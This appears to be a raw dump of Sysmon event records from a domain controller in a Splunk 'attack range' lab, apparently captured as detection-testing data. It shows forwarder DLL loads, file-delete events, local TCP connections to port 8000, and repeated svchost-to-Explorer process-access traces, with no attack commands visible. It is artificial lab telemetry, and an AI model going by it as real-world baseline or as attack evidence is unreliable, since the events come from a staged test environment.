CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75E,IMPHASH=8987D71C85BB2C13D3D90194331F962FtrueMicrosoft WindowsValid 734700x8000000000000000100854Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.984{326FD73D-C16B-6294-4D0B-000000005502}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9,IMPHASH=2CB5DA5225E972A08F32D04B8085DC7EtrueMicrosoft CorporationValid 23542300x8000000000000000100873Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:53.609{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=72309395F8D4691277FEBA7C6F2EBC2D,SHA256=6904FFE1C07E131A6745B4A29F50A18432DC09CF72329C77FC9DAD7B1AD80C44,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100874Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:54.702{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=399AC6CFCBBB081A76BFB4E18E896B50,SHA256=12BA1E5EA1362631EC0D8D73BA7FF62D91A6ACD8CDE57B58CFBF34C4531B8CCC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100875Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:55.796{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E4E74B7A47EE25F2968AB81B14FCEA3,SHA256=15F80FA1B99AAB3A68BD34B83E037C51847596FFDC658C8D4CD5C2A0AFE98723,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100876Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:56.890{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B3A626748686BC811342CD0E45300BA,SHA256=24010684F30C0CB84737038F47DA21C049C961A6A11B816D56EEEBB3014419A0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100878Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:57.984{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=46E039FA31F1EFB6A5FA9B1E384DD4DD,SHA256=DCAE33BC125AB5BF17D543D6AB7E306CB276E9D25873F4CC46704AA2FB2E7812,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x8000000000000000100877Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:54.004{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53364-false10.0.1.12-8000- 23542300x8000000000000000100879Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:59.077{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B376D44D62B811E3DA614AA9B0D5C325,SHA256=9B7EB59F4C0ED44B101C6DE5669EE7D016F2C31C5C5CD9974858C760D6AACB2B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100880Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:00.171{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F0F9230C1A40447F4179295D2F595A0,SHA256=75E1531D56194B2447196B780E216D60D954F92171FCA6C7C1A9CBC681A2183E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100881Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:01.265{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D46106D9F7A3BBDCB4826F90C2CCE71A,SHA256=8B6A9BBCE9D96F65BB95E70C036BD22048DD1A9DD730723E51AE105FE4ADD4E6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x8000000000000000100883Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:59.145{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53365-false10.0.1.12-8000- 23542300x8000000000000000100882Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:02.359{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DAE99789CA6EE170AC825721270B194F,SHA256=F90D7569BFF2EAB8D4410C07A6D287DD115C6B95FEBFD27AFFE0FA69DB84A49C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100884Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:03.452{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=429F96BB37D1CBBA354260995DAA43B6,SHA256=D485C903E7A50CDF2A4CA34AEF6BEC5812DD6F397FB0EDBB2D504EE4103AB069,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100885Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:04.546{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1784B37EF2E11688D83C113324649AB2,SHA256=AA52BE5730E616F9EC11926EBAAFED0733C3071588AD49B6AAD7C4612576C2A6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100886Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:05.640{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C6C7A621335A07A4331A01044E05C51,SHA256=D340BFC17597A22D2CA011C994D00707C86ACDB2502E09C69EFA6D2874BC5C35,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100887Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:06.734{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB2299896A9D2EB0686D004590DCE304,SHA256=D3A4BAD76536A2767DDF833974C3D1C8BD807482D0BA4CC9091AF0BD86350E0E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100888Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:07.827{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=935833C8269E23C756B2E5DCA2242A14,SHA256=DE2674FE720899DB904CF70114AA8A3D0675C3D5CD39AACD56663AE4AE317EEA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x8000000000000000100890Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:05.098{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53366-false10.0.1.12-8000- 23542300x8000000000000000100889Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:08.921{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4BBEB4E6EA65332EEB2EBEA5640029F6,SHA256=9A74C1D6B5B0F6BB6FDB8193B0592070D3D65F84A40799AC159C2EF8FE065F7D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x8000000000000000100928Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:10.155{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100927Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:10.155{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100926Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:10.155{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100925Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:10.155{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100924Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:10.155{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100923Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:10.155{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100922Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:10.155{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100921Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:10.155{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100920Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:10.155{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100919Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:10.155{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100918Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:10.155{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100917Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:10.155{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100916Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:10.155{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100915Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:10.155{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100914Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:10.155{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100913Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:10.155{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100912Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:10.155{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100911Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:10.155{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100910Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:10.155{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100909Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 